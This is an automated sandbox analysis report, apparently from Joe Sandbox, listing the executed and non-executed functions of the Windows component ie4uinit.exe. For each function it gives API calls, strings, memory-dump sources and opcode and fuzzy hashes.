Instruction Fuzzy Hash: 4D614865E0A6428AEB709B18EE502B936A0BF64F80F540135DB4DD76AADF3CEE45C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521B35C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B52115A0: memset.MSVCRT ref: 00007FF6B52115E9
Part of subcall function 00007FF6B52115A0: VerSetConditionMask.KERNEL32 ref: 00007FF6B5211603
Part of subcall function 00007FF6B52115A0: VerSetConditionMask.KERNEL32 ref: 00007FF6B5211612
Part of subcall function 00007FF6B52115A0: VerSetConditionMask.KERNEL32 ref: 00007FF6B5211621
Part of subcall function 00007FF6B52115A0: VerifyVersionInfoW.KERNEL32 ref: 00007FF6B5211642

LoadLibraryW.KERNEL32 ref: 00007FF6B521B38D
GetProcAddress.KERNEL32 ref: 00007FF6B521B3AE
FreeLibrary.KERNEL32 ref: 00007FF6B521B3D0

Strings

Internet-Browser-License-LicensedPartnerID, xrefs: 00007FF6B521B3BE
slc.dll, xrefs: 00007FF6B521B386
SLGetWindowsInformationDWORD, xrefs: 00007FF6B521B3A4

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ConditionMask$Library$AddressFreeInfoLoadProcVerifyVersionmemset
String ID: Internet-Browser-License-LicensedPartnerID$SLGetWindowsInformationDWORD$slc.dll
API String ID: 179017354-4234991666
Opcode ID: 96fd8919412aa2595a2c1029274416c6d0176d867f4885e756c88c1cf7ebb0a2
Instruction ID: 57067ce8e94058457cfe092da5e5221d3c7fcf9073c71d9181c8593dc26672e8
Opcode Fuzzy Hash: 96fd8919412aa2595a2c1029274416c6d0176d867f4885e756c88c1cf7ebb0a2
Instruction Fuzzy Hash: 7D119325A0E7118AE6149F09EA942BA63B0FB45F90F540035DF4C8778ADF7EED8AC740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521571C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 00007FF6B5215758

Part of subcall function 00007FF6B5219348: wcsncmp.MSVCRT(?,?,?,?,00000000,00007FF6B522AC11), ref: 00007FF6B5219379

SHCreateDirectoryExW.SHELL32 ref: 00007FF6B5215793

Strings

Microsoft\Internet Explorer, xrefs: 00007FF6B5215778

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CreateDirectoryFolderPathwcsncmp
String ID: Microsoft\Internet Explorer
API String ID: 3141627564-1876886251
Opcode ID: beaf11281d083635c08d568e7de318a548798a0b0680f5760d1ced29a3223f42
Instruction ID: 54b20e7a5980a112fdae3c93c8c3633d2740835c4e96d3cb174d98932538f029
Opcode Fuzzy Hash: beaf11281d083635c08d568e7de318a548798a0b0680f5760d1ced29a3223f42
Instruction Fuzzy Hash: 3811772171A75386FB645B29EE563FF6294EF85F80F444035DF4EC6A8ADE3DE8018A40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521AFF4 Relevance: 4.6, APIs: 3, Instructions: 50networkCOMMON

Download Yara Rule

APIs

#820.IERTUTIL ref: 00007FF6B521B033
SHCreateDirectoryExW.SHELL32 ref: 00007FF6B521B057
PathIsNetworkPathW.SHLWAPI ref: 00007FF6B521B074

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Path$#820CreateDirectoryNetwork
String ID:
API String ID: 801761627-0
Opcode ID: 92353b7b675f50cf25608c853ab1a54d7e44ce44ad219ba182cff8b4500ce04e
Instruction ID: 1235e44f25d263a096081b05a1e894dc4ebb83389e1f6dc93df33ec031907234
Opcode Fuzzy Hash: 92353b7b675f50cf25608c853ab1a54d7e44ce44ad219ba182cff8b4500ce04e
Instruction Fuzzy Hash: 27116036B09A5386EB20AB39EE953F623A1BF84F44F410035DB5DC365ADE3DE9498640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5215AD8 Relevance: 4.5, APIs: 3, Instructions: 26synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32 ref: 00007FF6B5215B01
WaitForSingleObject.KERNEL32(?,?,80004005,00007FF6B521317D), ref: 00007FF6B5215B0F
CloseHandle.KERNEL32(?,?,80004005,00007FF6B521317D), ref: 00007FF6B5215B18

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CloseHandleMessageObjectPostSingleThreadWait
String ID:
API String ID: 2249046209-0
Opcode ID: d3377d5071d618d0c6ebe101ace8b8c6169bfbcac3d3ef0026bbf390d11df7c7
Instruction ID: 4e0df4516ed489d9b04befd53b00f8c9f2529b09f2500fc9301d3d9b0c53d8b5
Opcode Fuzzy Hash: d3377d5071d618d0c6ebe101ace8b8c6169bfbcac3d3ef0026bbf390d11df7c7
Instruction Fuzzy Hash: AEE0ED10B063038BFBA55B39AF5167A2298AF40B40F182034CB05C6698DF3DEC938B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5215A5C Relevance: 3.0, APIs: 2, Instructions: 37windowthreadCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00007FF6B52159EE), ref: 00007FF6B5215AA6
PostThreadMessageW.USER32 ref: 00007FF6B5215AC1

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Message$FormatPostThread
String ID:
API String ID: 3288790767-0
Opcode ID: b4688424976053713e22a411ea5df759a78d31b989a7e0de54b0288b041de2f4
Instruction ID: b81650e80f1a0e4db937f795f8714ca92d17eabf5885fe525d055b4dc93bee16
Opcode Fuzzy Hash: b4688424976053713e22a411ea5df759a78d31b989a7e0de54b0288b041de2f4
Instruction Fuzzy Hash: 11018B32B25B5586D7108F54E988A8D33E9F708B90BA54038DB6C83710DF36DDA5CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521B460 Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

NetGetJoinInformation.NETAPI32 ref: 00007FF6B521B478
NetApiBufferFree.NETAPI32 ref: 00007FF6B521B495

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: BufferFreeInformationJoin
String ID:
API String ID: 3807213042-0
Opcode ID: 377603d7a30d25cc5db3636ac1baf9980b49de4382541923c520329c1d5c1068
Instruction ID: 0f5ce80a243f812bd18f1dc82e6aed780eedbfb1092f6b802b6860685a0fab96
Opcode Fuzzy Hash: 377603d7a30d25cc5db3636ac1baf9980b49de4382541923c520329c1d5c1068
Instruction Fuzzy Hash: B4E0D87262924187DB54CF64E5D14AAB360F784B41B80603BFB4BC2518DF3CE48DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521A4D8 Relevance: 1.5, APIs: 1, Instructions: 40networkCOMMON

Download Yara Rule

APIs

PathIsNetworkPathW.SHLWAPI(00007FF6B52125CC), ref: 00007FF6B521A4FA

Part of subcall function 00007FF6B521A2F4: CreateFileW.KERNEL32 ref: 00007FF6B521A339
Part of subcall function 00007FF6B521A2F4: GetLastError.KERNEL32 ref: 00007FF6B521A348
Part of subcall function 00007FF6B521A2F4: SHCreateDirectoryExW.SHELL32 ref: 00007FF6B521A363
Part of subcall function 00007FF6B521A2F4: CreateFileW.KERNEL32 ref: 00007FF6B521A39D
Part of subcall function 00007FF6B521A2F4: ConvertStringSidToSidW.ADVAPI32 ref: 00007FF6B521A3ED
Part of subcall function 00007FF6B521A2F4: #99.IERTUTIL ref: 00007FF6B521A434
Part of subcall function 00007FF6B521A2F4: LocalFree.KERNEL32 ref: 00007FF6B521A447
Part of subcall function 00007FF6B521A2F4: #37.IERTUTIL ref: 00007FF6B521A48F

Part of subcall function 00007FF6B521A170: GetCurrentProcess.KERNEL32 ref: 00007FF6B521A1BD
Part of subcall function 00007FF6B521A170: OpenProcessToken.ADVAPI32 ref: 00007FF6B521A1D0
Part of subcall function 00007FF6B521A170: GetNamedSecurityInfoW.ADVAPI32 ref: 00007FF6B521A21A
Part of subcall function 00007FF6B521A170: SetNamedSecurityInfoW.ADVAPI32 ref: 00007FF6B521A26A
Part of subcall function 00007FF6B521A170: LocalFree.KERNEL32 ref: 00007FF6B521A285
Part of subcall function 00007FF6B521A170: LocalFree.KERNEL32 ref: 00007FF6B521A297
Part of subcall function 00007FF6B521A170: CloseHandle.KERNEL32 ref: 00007FF6B521A2B2

Part of subcall function 00007FF6B521A2F4: GetLastError.KERNEL32 ref: 00007FF6B521A3B0
Part of subcall function 00007FF6B521A2F4: IsValidSid.ADVAPI32 ref: 00007FF6B521A41B
Part of subcall function 00007FF6B521A2F4: FindCloseChangeNotification.KERNEL32 ref: 00007FF6B521A4B6

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CreateFreeLocal$CloseErrorFileInfoLastNamedPathProcessSecurity$ChangeConvertCurrentDirectoryFindHandleNetworkNotificationOpenStringTokenValid
String ID:
API String ID: 1513689263-0
Opcode ID: 09f2045385a0e3583011558b58eca50c5022f07222ff13d13e64d49c21ccf82d
Instruction ID: 6ba3ad33e026d42df08f93e4fff861fff5e27c017e841c224f816c4819c84648
Opcode Fuzzy Hash: 09f2045385a0e3583011558b58eca50c5022f07222ff13d13e64d49c21ccf82d
Instruction Fuzzy Hash: 60019632B0C75285E6109B1AF9001ABA764BF95F94F040031DF8D83B5ADF3EE8408B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5216A5C Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

#650.IERTUTIL ref: 00007FF6B5216A86

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #650
String ID:
API String ID: 936228084-0
Opcode ID: 53993b22677627600bfc5543cafd368161df345289ff6722ee59e39c5e253c44
Instruction ID: ebd7d3f79f57d1586845169ac1d3229ff40acb166a93f4a105eca5c41d1343ca
Opcode Fuzzy Hash: 53993b22677627600bfc5543cafd368161df345289ff6722ee59e39c5e253c44
Instruction Fuzzy Hash: 20E039B271575587D7009F5AEA8415DB765FB88F80B98C03AC74883724DB34E8A5CA04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521B564 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

#701.IERTUTIL ref: 00007FF6B521B574

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #701
String ID:
API String ID: 1014962704-0
Opcode ID: 4ee29c3f97c311be22214ef5afee397f70503d7d1c846a1b8ffb3b5e5e9f990c
Instruction ID: 206c34ea750382e835f05ac84076f924ef5106aa4d8a71f1c18203dfcd1d9267
Opcode Fuzzy Hash: 4ee29c3f97c311be22214ef5afee397f70503d7d1c846a1b8ffb3b5e5e9f990c
Instruction Fuzzy Hash: 5DE01A69F0BB0382FB089B3EBE603A226A16FC8F54F444034C709C2259EF3DE8018640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521B5B0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

#701.IERTUTIL ref: 00007FF6B521B5C0

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #701
String ID:
API String ID: 1014962704-0
Opcode ID: aca5b28c5a1ca9f900d642336be1ac2d87ac2f5fa9b5555ec06c406419f1dcff
Instruction ID: 406422116ddb2791f9124aec7a1f0e558c0d0d417485e981ffaab73de66cbf5a
Opcode Fuzzy Hash: aca5b28c5a1ca9f900d642336be1ac2d87ac2f5fa9b5555ec06c406419f1dcff
Instruction Fuzzy Hash: A1E01264F0770345FB08972EBE6036625A17F48F91F444034DB09C6259EF3DE8014740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5216930 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

#655.IERTUTIL ref: 00007FF6B5216964

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #655
String ID:
API String ID: 1202143355-0
Opcode ID: ffc094cae51bb6d9c7fd23f890016d908ab2f0a820d5672fdd2ac3c749448eee
Instruction ID: af1db24b6e3145c0304e81162afabfdaa207cfc4cf019a917a678021bc63d473
Opcode Fuzzy Hash: ffc094cae51bb6d9c7fd23f890016d908ab2f0a820d5672fdd2ac3c749448eee
Instruction Fuzzy Hash: 9EE086719142548BE3106B18E94434E7770F794774F901320D3B5477D6CF7E95568F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52335F0 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

__wgetmainargs.KERNELBASE ref: 00007FF6B5233628

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: __wgetmainargs
String ID:
API String ID: 1709950718-0
Opcode ID: 89d07be83c3f390e7707a018dc140ed67188c345eb38bfe0268f0bd6a2015586
Instruction ID: 75dcae85dad96dea535860a42b7f2394ccae0f923fecc83eb74f85686bdaf8ee
Opcode Fuzzy Hash: 89d07be83c3f390e7707a018dc140ed67188c345eb38bfe0268f0bd6a2015586
Instruction Fuzzy Hash: 6DE07575E0AA4396EF10AB59FE514E03764BB14B04F400132C70D93639DF3CE955C780

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF6B5230A8C Relevance: 89.4, APIs: 26, Strings: 25, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF6B5230AC2
_wcsicmp.MSVCRT ref: 00007FF6B5230AE7
_wcsicmp.MSVCRT ref: 00007FF6B5230B03

Strings

EXPLORER.EXE, xrefs: 00007FF6B5230B31
Te.ProcessHost.exe, xrefs: 00007FF6B5230BB7
DCIScanner, xrefs: 00007FF6B5230C87
IEXPLORE.EXE, xrefs: 00007FF6B5230ADA
RESTOREOPTIN.EXE, xrefs: 00007FF6B5230C6B
FirstLogonAnim.exe, xrefs: 00007FF6B5230C4F
SYSPREP.EXE, xrefs: 00007FF6B5230B15
microsoftedge.exe, xrefs: 00007FF6B5230CA6
authhost.exe, xrefs: 00007FF6B5230D5D
USERACCOUNTBROKER.EXE, xrefs: 00007FF6B5230C17
jshost.exe, xrefs: 00007FF6B5230D44
microsoftedgecp.exe, xrefs: 00007FF6B5230CC2
microsoftedgesh.exe, xrefs: 00007FF6B5230CDE
pickerhost.exe, xrefs: 00007FF6B5230CF9
NETPLWIZ.EXE, xrefs: 00007FF6B5230BFB
msvsmon.exe, xrefs: 00007FF6B5230D12
TE.EXE, xrefs: 00007FF6B5230BA3
browser_broker.exe, xrefs: 00007FF6B5230D2B
WWAHOST.EXE, xrefs: 00007FF6B5230B69
LOADER42.EXE, xrefs: 00007FF6B5230B4D
MSOOBE.EXE, xrefs: 00007FF6B5230BDF
IEUTLAUNCH.EXE, xrefs: 00007FF6B5230B85
FAKEVIRTUALSURFACETESTAPP.EXE, xrefs: 00007FF6B5230BCB
MSFEEDSSYNC.EXE, xrefs: 00007FF6B5230AF9
MSHTMPAD.EXE, xrefs: 00007FF6B5230C33

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: _wcsicmp$FileModuleName
String ID: DCIScanner$EXPLORER.EXE$FAKEVIRTUALSURFACETESTAPP.EXE$FirstLogonAnim.exe$IEUTLAUNCH.EXE$IEXPLORE.EXE$LOADER42.EXE$MSFEEDSSYNC.EXE$MSHTMPAD.EXE$MSOOBE.EXE$NETPLWIZ.EXE$RESTOREOPTIN.EXE$SYSPREP.EXE$TE.EXE$Te.ProcessHost.exe$USERACCOUNTBROKER.EXE$WWAHOST.EXE$authhost.exe$browser_broker.exe$jshost.exe$microsoftedge.exe$microsoftedgecp.exe$microsoftedgesh.exe$msvsmon.exe$pickerhost.exe
API String ID: 1034258996-314592976
Opcode ID: dd52f77a89a8c24116ce5e93daae8bbd4a0d6a86083c7a9e704fefb9976d721b
Instruction ID: 8f83c3488abf28c79f94601bd5a65c81b8e81e3bfe509654bd082ee8a9f7d9d5
Opcode Fuzzy Hash: dd52f77a89a8c24116ce5e93daae8bbd4a0d6a86083c7a9e704fefb9976d721b
Instruction Fuzzy Hash: FF91C624A0AA0789FA799B19EE506F533A6AF54F41B445435CA0EC229EEF7DFD0DC210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5213D20 Relevance: 58.0, APIs: 26, Strings: 7, Instructions: 293fileregistrystringCOMMON

Download Yara Rule

APIs

GetShortPathNameW.KERNEL32 ref: 00007FF6B5213D69
GetShortPathNameW.KERNEL32 ref: 00007FF6B5213DB5
PathFindFileNameW.SHLWAPI ref: 00007FF6B5213DC7

Part of subcall function 00007FF6B52190F4: LocalFree.KERNEL32 ref: 00007FF6B5219312

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6B5213DF4
SetCurrentDirectoryW.KERNEL32 ref: 00007FF6B5213E05
FindFirstFileW.KERNEL32 ref: 00007FF6B5213E1F
CoCreateInstance.OLE32 ref: 00007FF6B5213E55
StrCmpIW.SHLWAPI ref: 00007FF6B5213EE3
StrCmpIW.SHLWAPI ref: 00007FF6B5213F0A
PathRemoveBlanksW.SHLWAPI ref: 00007FF6B5213F42
StrCmpICW.SHLWAPI ref: 00007FF6B5213F61
StrCmpICW.SHLWAPI ref: 00007FF6B5213F79
ILCreateFromPath.SHELL32 ref: 00007FF6B5213FC3
ILCreateFromPath.SHELL32 ref: 00007FF6B5213FFB
RegOpenKeyExW.ADVAPI32 ref: 00007FF6B5214042
StrCmpIW.SHLWAPI ref: 00007FF6B521408A
RegCloseKey.ADVAPI32 ref: 00007FF6B52140A5
ILFree.SHELL32 ref: 00007FF6B52140B0
FindNextFileW.KERNEL32 ref: 00007FF6B52140C3
FindClose.KERNEL32 ref: 00007FF6B52140F8
FindFirstFileExW.KERNEL32 ref: 00007FF6B5214159
lstrcmpW.KERNEL32 ref: 00007FF6B5214177

Part of subcall function 00007FF6B521894C: wcschr.MSVCRT ref: 00007FF6B52189B4

lstrcmpW.KERNEL32 ref: 00007FF6B521418C
FindNextFileW.KERNEL32 ref: 00007FF6B52141FC
FindClose.KERNEL32 ref: 00007FF6B521420D
SetCurrentDirectoryW.KERNEL32 ref: 00007FF6B521421A

Strings

-extoff, xrefs: 00007FF6B5213F6B
*.lnk, xrefs: 00007FF6B5213E18
shell:::{871C5380-42A0-1069-A2EA-08002B30309D}, xrefs: 00007FF6B5213FBC
IEXPLORE.EXE, xrefs: 00007FF6B5214083
shell:::{2559a1f4-21d7-11d4-bdaf-00c04f60b9f0}, xrefs: 00007FF6B5213FF4
Software\Clients\StartMenuInternet, xrefs: 00007FF6B5214034
-nohome, xrefs: 00007FF6B5213F53

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Find$Path$File$CloseCreateCurrentDirectoryName$FirstFreeFromNextShortlstrcmp$BlanksInstanceLocalOpenRemovewcschr
String ID: *.lnk$-extoff$-nohome$IEXPLORE.EXE$Software\Clients\StartMenuInternet$shell:::{2559a1f4-21d7-11d4-bdaf-00c04f60b9f0}$shell:::{871C5380-42A0-1069-A2EA-08002B30309D}
API String ID: 1000041407-3405740670
Opcode ID: 5d23bd38dd012cebc5d80024e9f86e5bf59b1457f7b608da9a8fcce831279e11
Instruction ID: d3349ba72870c6117072fafdf988fc48482a6bf01dd93e5d3b88fe890096fe01
Opcode Fuzzy Hash: 5d23bd38dd012cebc5d80024e9f86e5bf59b1457f7b608da9a8fcce831279e11
Instruction Fuzzy Hash: C6E14221B0AA5395EB209F29DE902EA2365FB54F84F500131DB0DC769EDF7DE949C740

Uniqueness

Uniqueness Score: -1.00%

